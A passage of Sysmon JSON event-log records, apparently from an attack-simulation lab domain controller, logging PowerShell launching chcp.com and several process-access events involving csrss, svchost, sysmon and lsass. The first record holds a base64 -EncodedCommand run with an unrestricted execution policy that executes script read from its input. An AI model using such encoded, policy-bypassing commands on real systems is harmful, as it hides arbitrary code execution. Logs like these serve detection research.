65001","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD","ParentProcessGuid":"{E2A3D6B1-11D8-5F25-0000-00104F900800}","ParentProcessId":"4660","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5901,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.620\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-00104F900800}\r\nSourceProcessId: 4660\r\nSourceThreadId: 3452\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-00102A9C0800}\r\nTargetProcessId: 3700\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|UNKNOWN(00007FFF98AB2F4B)|UNKNOWN(00007FFF97F54025)|UNKNOWN(00007FFF97F53CF6)|UNKNOWN(00007FFF98A0510B)|UNKNOWN(00007FFF97F1488C)|UNKNOWN(00007FFF97F72D5B)|UNKNOWN(00007FFF97F563C0)|UNKNOWN(00007FFF97F563C0)|UNKNOWN(00007FFF97F56251)|UNKNOWN(00007FFF97F481D6)|UNKNOWN(00007FFF97F54709)|UNKNOWN(00007FFF97F542FC)|UNKNOWN(00007FFF97F54025)|UNKNOWN(00007FFF97F53CF6)|UNKNOWN(00007FFF98A0510B)|UNKNOWN(00007FFF97F3AB57)|UNKNOWN(00007FFF97F3A127)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.620","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-00104F900800}","SourceProcessId":"4660","SourceThreadId":"3452","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-00102A9C0800}","TargetProcessId":"3700","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|UNKNOWN(00007FFF98AB2F4B)|UNKNOWN(00007FFF97F54025)|UNKNOWN(00007FFF97F53CF6)|UNKNOWN(00007FFF98A0510B)|UNKNOWN(00007FFF97F1488C)|UNKNOWN(00007FFF97F72D5B)|UNKNOWN(00007FFF97F563C0)|UNKNOWN(00007FFF97F563C0)|UNKNOWN(00007FFF97F56251)|UNKNOWN(00007FFF97F481D6)|UNKNOWN(00007FFF97F54709)|UNKNOWN(00007FFF97F542FC)|UNKNOWN(00007FFF97F54025)|UNKNOWN(00007FFF97F53CF6)|UNKNOWN(00007FFF98A0510B)|UNKNOWN(00007FFF97F3AB57)|UNKNOWN(00007FFF97F3A127)","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5902,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.620\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-00102A9C0800}\r\nTargetProcessId: 3700\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.620","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-00102A9C0800}","TargetProcessId":"3700","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5903,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.620\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.620","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5904,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.620\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.620","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5905,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.620\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.620","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5906,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.620\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.620","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5907,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.620\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.620","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5908,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.620\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 